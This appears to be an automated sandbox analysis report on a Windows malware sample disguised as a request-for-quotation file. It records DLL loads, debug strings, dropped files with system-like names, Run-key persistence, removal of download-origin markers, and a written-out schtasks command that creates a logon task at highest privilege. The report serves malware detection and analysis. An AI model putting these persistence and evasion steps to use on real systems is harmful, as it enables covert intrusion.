                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb1 source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbv source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdbRSDS source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, vexplorers.exe, 00000034.00000000.1950262138.00000000008B2000.00000002.00000001.01000000.0000000B.sdmp, vexplorers.exe.15.dr
                    Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: .pdbHJ source: svchost.exe, 00000008.00000002.1993163112.000000A226562000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: WERBC7D.tmp.dmp.31.dr
                    Source: Binary string: System.Windows.Forms.pdb` source: WERA82A.tmp.dmp.18.dr
                    Source: Binary string: System.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: svchost.exe, 00000008.00000002.2008517923.000001A4FFF58000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: System.Core.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: C:\Users\user\AppData\Roaming\svchost.PDB source: svchost.exe, 00000008.00000002.1993163112.000000A226562000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, vexplorers.exe, 00000034.00000000.1950262138.00000000008B2000.00000002.00000001.01000000.0000000B.sdmp, vexplorers.exe.15.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 00000008.00000002.2007386416.000001A4FE0AC000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: pC:\Users\user\AppData\Roaming\svchost.PDB@ source: svchost.exe, 00000008.00000002.1993163112.000000A226562000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.Drawing.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: Microsoft.VisualBasic.pdbp^y source: WERD370.tmp.dmp.40.dr
                    Source: Binary string: mscorlib.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: 91\??\C:\Windows\symbols\dll\mscorlib.pdbx source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF76000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb\??\C:\Windows\mscorlib.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb- source: WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: svchost.PDB source: svchost.exe, 00000008.00000002.1993163112.000000A226562000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\mscorlib.pdban) source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: mscorlib.pdbSystem.Windows.Forms.ni.dllMZ source: WERBC7D.tmp.dmp.31.dr
                    Source: Binary string: mscorlib.pdb@Yx source: WERD370.tmp.dmp.40.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeStatic PE information: 0xFAFBEEAE [Sat Jun 9 06:43:58 2103 UTC]
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeCode function: 0_2_00007FFD9B98026B push esp; retf 4810h0_2_00007FFD9B980312
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 8_2_00007FFD9B95026B push esp; retf 4810h8_2_00007FFD9B950312
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 10_2_00007FFD9B97026B push esp; retf 4810h10_2_00007FFD9B970312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_010A0B4F push edi; ret 15_2_010A0CC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_010A0C95 push edi; retf 15_2_010A0C3A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_010AD9F7 push esp; retf 15_2_010ADA05
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 26_2_00F30C3D push edi; ret 26_2_00F30CC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 26_2_00F3D9FF push esp; retf 26_2_00F3DA0D
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 27_2_00007FFD9B94026B push esp; retf 4810h27_2_00007FFD9B940312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 37_2_01090B4D push edi; ret 37_2_01090CC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 37_2_01090C95 push edi; retf 37_2_01090C3A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 37_2_0109D9FF push esp; retf 37_2_0109DA0D
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 41_2_00007FFD9B98026B push esp; retf 4810h41_2_00007FFD9B980312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 48_2_010C0B4D push edi; ret 48_2_010C0CC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 48_2_010C0C95 push edi; retf 48_2_010C0C3A

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with benign system names
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeJump to dropped file
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file

                    Boot Survival

                    barindex
                    Creates multiple autostart registry keys
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vexplorers
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vexplorers
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vexplorers

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe:Zone.Identifier read attributes | delete
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
